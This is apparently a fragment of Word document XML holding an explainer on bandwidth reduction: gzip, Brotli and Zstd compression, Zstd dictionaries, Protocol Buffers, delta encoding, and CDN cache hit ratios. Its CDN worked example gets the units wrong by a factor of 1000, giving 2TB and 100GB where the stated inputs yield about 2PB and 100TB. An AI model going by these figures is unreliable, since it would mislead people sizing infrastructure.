    <w:p w14:paraId="6409A4B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Large companies (Google, Facebook, Netflix, Amazon) have </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zero-cost bandwidth</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for most traffic because they peer directly with ISPs at internet exchanges, exchanging traffic settlement-free. Their bandwidth cost is infrastructure capital expenditure (fiber, routers, switches), not per-GB charges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61011390" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compression — Bandwidth Reduction at the Application Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01586AA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression trades </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU time</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth savings</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>. The trade-off: compression CPU overhead vs bandwidth cost and transfer time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380085B9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP content encoding — the delivery layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0716EA1F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15205306" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Client: Accept-Encoding: gzip, br, zstd, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141DC3A8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server: Content-Encoding: br    (Brotli compression selected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E7B987" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gzip (DEFLATE algorithm):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C56468" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression ratio: 60–80% for HTML, CSS, JSON (2.5–5× size reduction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9C6FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression speed: ~200–500 MB/s per CPU core (fast, suitable for on-the-fly compression).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743D69D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Decompression speed: ~500MB–1GB/s per CPU core (faster than compression).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D24CB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Level 1 (fastest): minimal CPU, ~50% compression. Level 9 (best): high CPU, ~70% compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C95ED6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Production recommendation: Level 5–6 for balance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2547D81D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brotli:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503A95FF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression ratio: 20–26% better than gzip at equivalent CPU cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729930B9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Decompression speed: similar to gzip (~500MB/s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF2848" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression speed: Level 1–4: similar to gzip. Level 11 (max): 100× slower than gzip, rarely used on-the-fly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E954C1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Brotli uses a pre-defined dictionary of common web content patterns (HTML tags, CSS properties, JS keywords) — giving it better starting compression for web content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20656108" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-compress static assets</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> with Brotli level 11 at build time; serve dynamically with Brotli level 4–6 for real-time compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C483F7A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zstandard (Zstd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB827C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Developed by Facebook, used extensively for internal data compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DACBE4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression ratio: comparable to Brotli.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCD86C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compression speed: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3× faster than gzip</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> at similar compression ratios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9784F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Decompression speed: </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>faster than gzip</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — important for latency-sensitive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D500DA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dictionaries</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>: pre-train a dictionary on a corpus of similar data (e.g., API responses, log entries). The dictionary captures common patterns, improving compression ratio for small messages dramatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E6E42" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zstd dictionary compression for API responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28A342" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Small API responses (1–10KB) don't compress well with general-purpose compression — there's insufficient data for the algorithm to find redundancies. With a Zstd dictionary trained on typical API responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BE72E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB09F23" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Original JSON API response: 2KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5C9DE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Gzip (no dictionary): 1.4KB — 30% reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE46C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Zstd with dictionary: 0.6KB — 70% reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE272B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="66918585" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Across 1 billion API calls/day:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BC248B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Gzip bandwidth: 1.4 TB/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2D18D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Zstd bandwidth: 0.6 TB/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDB4D0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Savings: 0.8 TB/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE57F2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Facebook uses Zstd dictionaries for Thrift RPC calls — achieving 60–70% compression on small messages that would otherwise be incompressible or poorly compressible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410A439" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When not to compress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78F939" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Already-compressed data (JPEG, PNG, MP4, zip files): compression produces larger output (entropy is already high — no redundancy to exploit). The CPU cost is wasted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FDC35E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Very small responses (&lt;1KB): compression headers add overhead that may exceed the savings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563CC7D0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Very high-frequency low-latency RPC: compression CPU cost may exceed bandwidth savings benefit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA4828" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Semantic compression (application-level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F1F52" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Beyond generic compression, application-level data redesign can reduce bandwidth more dramatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A138C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol Buffers vs JSON:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A JSON object {"user_id": 12345, "score": 98.7} = 34 bytes. Protocol Buffers equivalent = ~8 bytes (2.5–4× more efficient than JSON). The savings come from eliminating field names (replaced by field numbers), using more compact integer encoding (varint), and using binary float representation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BCF4E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Delta encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Instead of sending full state, send only changes. Telemetry systems, game state synchronization, and live document collaboration all exploit delta encoding. A GPS tracker sending location updates: instead of {lat: 37.7749, lon: -122.4194} every second (20 bytes JSON), send delta from last position: {dlat: +12, dlon: -8} (5 bytes) — 4× bandwidth reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CD932" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Field filtering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> API responses often include dozens of fields; clients need only a few. GraphQL's explicit field selection, or REST APIs with ?fields=id,name,score parameters, avoid transmitting unused data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C548A7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN — Bandwidth Optimization at the Distribution Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B810150" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A CDN (Content Delivery Network) reduces </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>origin bandwidth consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> by serving content from edge nodes close to users. The critical metric is </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache hit ratio</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — the fraction of requests served from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C4150" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth savings from caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A027F98" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE5A26B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Without CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30949F31" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  100M users × 2MB average page resources × 10 page views/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABD6BE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  = 2TB bandwidth from origin per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A1CD9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="7B11AB43" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>With CDN at 95% cache hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4220C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  5% cache misses = 100M × 10 × 5% = 50M requests to origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB182E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  50M × 2MB = 100GB bandwidth from origin per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB4CE4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  CDN → users: 2TB (CDN's bandwidth, not yours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2198CD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEFBF60" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth savings: 2TB → 100GB = 95% reduction in origin bandwidth cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D839E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cache hit ratio is the most important CDN metric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF11A7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>80% hit ratio: origin serves 20% of traffic → 5× bandwidth reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A54F18E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>95% hit ratio: origin serves 5% of traffic → 20× bandwidth reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3D623" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>99% hit ratio: origin serves 1% of traffic → 100× bandwidth reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFAD8BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Improving cache hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48593382" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cache key normalization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Two URLs that return identical content should have the same cache key. ?utm_source=email tracking parameters shouldn't create separate cache entries. CDN configuration strips these parameters before computing the cache key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119D733" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Long TTLs for versioned content:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Content-addressed URLs (/static/app.a3b4c5d6.js) change URL when content changes → safe to cache forever (max-age=31536000, immutable). Near-100% cache hit ratio for static assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77617240" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Short TTLs for dynamic content:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> HTML pages that change frequently need short TTLs (60s–300s). Even short-TTL caching helps enormously during traffic spikes — a CDN serves all requests for the same page from cache for 60 seconds, regardless of how many users simultaneously request it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70690053" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Regional clustering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> CDN traffic from the same region uses the same PoP. A cache miss at the edge fetches from a regional mid-tier (which has a larger cache) rather than the origin. Two-tier caching improves hit ratios dramatically for long-tail content.</w:t>
      </w:r>
    </w:p>
